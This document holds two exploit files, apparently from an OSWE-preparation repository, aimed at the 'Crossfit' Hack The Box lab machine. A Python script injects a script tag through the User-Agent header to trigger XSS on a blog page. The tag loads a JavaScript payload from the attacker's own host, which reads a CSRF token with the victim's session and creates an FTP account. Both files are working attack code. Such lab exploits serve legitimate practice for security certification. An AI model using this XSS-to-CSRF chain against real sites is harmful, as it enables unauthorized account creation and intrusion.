File: Crossfit/CreateFTPUser.js
// Host this file on your server on port 80
function GetCSRFToken(){
    var req = new XMLHttpRequest()
    var url = "http://ftp.crossfit.htb/accounts/create" //page you wanna read
    req.open('GET', url, false) // false: wait till the response is received
    req.withCredentials = true // to keep the session
    req.send()
    var response = req.responseText
    // parse the response to extract the CSRF token value
    parser = new DOMParser()
    var doc = parser.parseFromString(response, "text/html")
    var csrfToken = doc.getElementsByName('_token')[0].value // extract the CSRF token to send a valid request
    return csrfToken
}

function CreateFTPUser(){
    req = new XMLHttpRequest()
    url = "http://ftp.crossfit.htb/accounts"
    csrfToken = GetCSRFToken()
    var data = "username=johndoe&pass=password123&_token=" + csrfToken
    req.open('POST', url, true)
    req.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded')
    req.withCredentials = true // to keep the session
    req.send(data)
    var response = req.responseText
    return response
}

CreateFTPUser()

File: Crossfit/CreateFTPUser.py
import requests
import argparse
import traceback
from urllib.parse import urljoin


def CreateFTPUser(lhost):
    """
    IMPORTANT:
    for the script to create an FTP user, you must host https://github.com/solimanalmansor/OSWE-Prep/blob/main/Crossfit/CreateFTPUser.js
    on yor python server on port 80
    """
    url = "http://gym-club.crossfit.htb:80/blog-single.php"
    headers = {"User-Agent": f"<script src=\"http://{lhost}/CreateFTPUser.js\"></script>", "Content-Type": "application/x-www-form-urlencoded", "Origin": "http://gym-club.crossfit.htb"}
    data = {"name": "John Doe", "email": "john@doe.ltd", "phone": "123456789", "message": "<script>", "submit": "submit"}
    try:
        print("[*] Triggering the XSS vulnerability...")
        requests.post(url, headers=headers, data=data)
        print("[+] FTP user created successfully. Please login with johndoe:password123")
    except Exception as e:
        print("[-] Failed to trigger the XSS vulnerability: ", e)
        traceback.print_exc()

def main():
    parser = argparse.ArgumentParser(description="Create an FTP user on the server")
    parser.add_argument("lhost", help="Attacker machine's IP")
    args = parser.parse_args()

    CreateFTPUser(args.lhost)

if __name__ == "__main__":
    main()
